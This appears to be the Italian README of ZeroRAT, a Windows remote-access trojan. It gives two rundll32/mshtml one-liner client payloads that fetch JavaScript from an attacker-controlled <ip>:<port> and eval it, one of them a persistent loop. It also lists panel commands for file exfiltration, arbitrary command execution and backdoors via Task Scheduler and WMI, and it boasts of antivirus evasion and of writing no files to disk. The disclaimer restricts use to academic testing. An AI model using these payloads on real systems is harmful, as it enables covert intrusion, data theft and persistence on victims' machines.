
ZeroRAT è un RAT one-liner per Windows.
#ZeroRAT ##Introduzione RAT (Remote Administration Tool) per Windows. Il client richiede l'esecuzione di un solo comando, sfrutta programmi nativi di Windows, non scrive file su disco e possiede caratteristiche di evasione antivirus naturali. Diventa inefficace dopo un riavvio.
Nel programma download e upload sono dal punto di vista del client. Il client che scarica un file dal server si chiama download, il client che carica un file sul server si chiama upload.
##Configurazione In config.py modificare l'indirizzo a cui si connette il client e la password di amministrazione del pannello. Ricordarsi di verificare di aver disattivato il debug.
Il programma dipende da flask e sqlite3, installarli con pip.
##Client
Sostituire <ip>:<port> con l'indirizzo effettivo di connessione.
Versione normale
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}
Versione persistente
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}
##Server
Pannello di amministrazione: http://<ip>:<port>/server/
I comandi supportati dal server sono:
sessions Elenca i client attiviuse <id> Seleziona il client in base all'idset <key> <value> Imposta variabili globalishow globals/downloads/uploads Visualizza le variabili globali, i file che il client può scaricare e i file caricati dal clientdelete session Elimina il client correntedelete download/upload <id> Elimina un file in base all'idupfile Carica un file sul server e lo aggiunge alla lista downloadsdownload Impostando le variabili download_file e download_save_path si fa scaricare al client un file e salvarlo in download_save_pathupload Impostando la variabile upload_file si fa caricare al client il file upload_file sul serverbackdoor tasks <time> Lascia una backdoor tramite l'utilità di pianificazione di Windows, formato orario 00:00backdoor wmi Lascia una backdoor tramite WMI, eseguita ogni oraOltre ai comandi sopra elencati, tutto il resto viene eseguito come comando di sistema Windows.
Per i dettagli sui comandi vedere /static/js/xkcd_cli.js
##Sviluppo I comandi del pannello gestiscono il client: /static/js/xkcd_cli.js
I comandi del pannello gestiscono il server: /controllers/server.py
Il client è gestito in: /controllers/client.py
Generazione del payload del client: payload.py
Operazioni relative al database: /models/
##Contatti http://5alt.me
md5_salt [AT] qq.com
##Riferimenti https://gist.github.com/subTee/f1603fa5c15d5f8825c0
http://drops.wooyun.org/tips/11764
http://drops.wooyun.org/tips/8290
http://drops.wooyun.org/tips/12354
https://github.com/chromakode/xkcdfools
http://www.kammerl.de/ascii/AsciiSignature.php
https://github.com/AlessandroZ/LaZagne
##Disclaimer Quando si utilizza questo strumento, rispettare le leggi locali. Può essere usato esclusivamente per test accademici. È severamente vietato il controllo illegale di computer altrui. In caso di danni, l'autore non è responsabile.
##License GPLV3
##TODO
meterpreter shellcode Installa meterpreter tramite shellcode eseguito con InstallUtil, richiede di impostare prima LHOST e LPORT (può continuare a ricevere comandi solo dopo migrate, dipende da .NET Framework 2.0)meterpreter powershell Installa meterpreter tramite PowerShell (dipende da PowerShell 1.0)